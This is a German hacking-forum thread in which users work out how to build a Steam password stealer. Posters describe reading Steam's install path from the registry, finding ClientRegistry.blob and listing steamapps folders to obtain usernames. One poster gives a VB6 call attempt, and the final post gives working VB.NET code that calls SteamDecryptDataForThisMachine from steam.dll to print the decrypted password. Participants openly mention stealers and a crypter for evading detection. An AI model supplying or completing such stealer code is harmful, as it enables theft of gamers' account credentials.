ClientRegistry.blob decrypt?

[Hamtaro]

st bestimmt irgendwie möglich... viele Stealer sind auch in VB gecodet und klauen Steam-PWs... schau dir einfach von aluigi den C source an.
Ich glaub der benutzt das alles ohne steam.dll einfach in der ClientRegistry.blob irgendwelche Hex-Codes auslesen etc. so etwas kann bestimmt auch VB..

Irrtum, das VERSCHLÜSSELTE Pw ist in der clientregistry.blob gespeichert, zum entschlüsseln wird die Steamfunktion genutzt, weil das einfacher ist, als den Algorithmus zu reversen (das hat aber glaub ich auch schon einer gemacht, siehe aluigi.freeforums.com).
Und die größte Schwierigkeit wird es wohl sein eine Funktion dynamisch zu laden, da VB6 afaik keine ordentlische Zeigerarithmetik hat.

[snify]

ok.... trotzdem viel Glück

[EXECUTiON]

@Hamtaro: dann gehts met in vb6 oder? dann lag ich richtig... shiCe

[Jaro]

ist bestimmt irgendwie möglich... viele Stealer sind auch in VB gecodet und klauen Steam-PWs.

Was nicht heißt, dass sie die Logins selber entschlüsseln! Die meistens nutzen 3rd hand tools, die sie als Resourcen droppen, die Daten entschlüsseln lassen und dann nurnoch versenden!

Möglich ist es das ganze auch nur in VB zu machen, wie frag mich aber nicht, hab mich nie mit PW's decrypten beschäftigt, aber erinner mich dran, dass einige gesagt haben es würde gehen und es auch schon Stealer gibt, die sich die Daten so holen! Es geht irgendwie über die steam.dll, wie genau aber keine Ahnung!

[1312]

coded lieber mal was gescheites, wie den korrekten Usernamen zudem richtigen Passwort.

naja einfach alle ordner aus dem ordner Steam\steamapps\ auflisten
is doch auch ok D;

zum thema wie schon auf seite 1 steht würd ich das mit loadlibary und getprocaddress probieren
das man die registry brauch ist schon richtig
von dort entnimmst du den install pfad von steam damit du weisst wo sich die ClientRegistry.blob (in der das passwort verschlüsselt gespeichert ist) befindet
auserdem kann man dann wie ich oben geschrieben habe die ordner namen aus Steam\Steamapps\ auflisten um die Usernamen zu bekommen
denn nicht jeder hat das spiel unter "C:\Programme" installiert zB bei Vista "C:\Programm Files" oder manche benutze ordner wie "Games"
darauf sollte man achten wenn man soetwas codet deshalb funktionieren öfter verschiedene programme nicht unter vista

natürlich kannst du es auch in C kompilieren und als resource in dein vb prog einbauen hab ich früher auch getan bis ich dann ein recode komplett in c++ gemacht habe (http://www.pic-upload.de/02.03.09/ycvgja.jpg)
nur der ServerEditor ist in vb gecodet ;]

http://aluigi.freeforums.org/how-ste...works-t19.html

[w0red]

Also um es mit VB zu machen, brauchst du ne wrapper class, denn VB6 unterstützt die cdecl Methode nicht.
Ich habs mit der Klasse
versucht, aber anscheinend wird das Verschlüsselte Passwort nicht richtig übergeben.

Code:

CallFunc("SteamDecryptDataForThisMachine", strptr(encpwd), Len(encpwd), StrPtr(pwd), 46, 0)

Denn ich bekomm als Rückgabewert nur ne 8 ... vlt. hat ja einer ne ahnung, ich hab keine Lust weiterrum zu testen^^

Mfg
w0red

[EXECUTiON]

ich werd es mir mal anschauen und hoffen das es geht und ich net wieder mal zeit verschwende weil ich rumprobiere und es dann eh net geht ^^

[Hamtaro]

ich werd es mir mal anschauen und hoffen das es geht und ich net wieder mal zeit verschwende weil ich rumprobiere und es dann eh net geht ^^

Und dann probiert mans anders.
Das nennt man Forschung.

[EXECUTiON]

naja forschung missglückt ... egal will eh erst mal an dem crypter weitermachen das hat vorrang der stealer hat noch nen bissel time ^^

[igoe*star]

Das Passwort zu Entschlüsseln, ist doch wohl das geringste Problem...
Ich weis gar nicht was ihr alle habt, ihr macht euch ja einen kopf...

Habe es mal hier für euch in .NET.

Code:

Imports System.Runtime.InteropServices
Imports System.Text

Module SteamDecrypt
    <DllImport("Steam.dll", CallingConvention:=CallingConvention.Cdecl)> _
    Public Function SteamDecryptDataForThisMachine(ByVal encryptedData As String, ByVal encryptedDataSize As Integer, ByVal decryptedBuffer As StringBuilder, ByVal decryptedBufferSize As Integer, ByRef decryptedDataSize As Integer) As Integer
    End Function
    Sub Main(ByVal args() As String)

        Dim encpwd As String = Console.ReadLine()
        Dim decryptedDataSize As Integer = 0
        Dim pwd As New StringBuilder
        pwd.Length = encpwd.Length / 2
        If SteamDecryptDataForThisMachine(encpwd, encpwd.Length, pwd, pwd.Length, decryptedDataSize) = 0 Then
            Console.WriteLine(Constants.vbLf & " Password: " & pwd.ToString())
            Console.ReadLine()
        End If
    End Sub
End Module

Greets Igoe